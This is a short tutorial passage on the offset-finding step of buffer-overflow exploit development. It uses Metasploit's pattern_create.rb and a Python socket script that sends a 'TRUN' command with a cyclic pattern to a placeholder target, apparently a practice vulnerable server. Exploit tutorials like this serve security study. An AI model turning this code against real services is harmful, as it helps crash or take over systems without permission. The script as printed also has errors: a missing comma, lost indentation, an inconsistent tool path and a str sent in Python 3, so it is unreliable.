Finding the Offset
Metasploitprovides a tool to do this already, found at/usr/share/metasploit-framework/tools/exploit/pattern_create.rbin kaliUsing the number found during our fuzzing, pass that value to this tool:
/usr/share/metasploit_framework/tools/exploit/pattern_create.rb -l NUMBERYou will get back a random string of characters which then you can add back to the fuzzing script, so now it will look something like this:
#!/usr/bin/python3
import sys, socket
# This string is what we get back from the pattern_create.rb tool
offset = "RANDOM_STRING"
try:
s=socket.socket(socket.AF_INETsocket.SOCK_STREAM)
s.connect(('TARGET_IP', PORT))
s.send(('TRUN /.:/' + offset))
s.close()
except:
print("Error connecting to server")
sys.exit()Last updated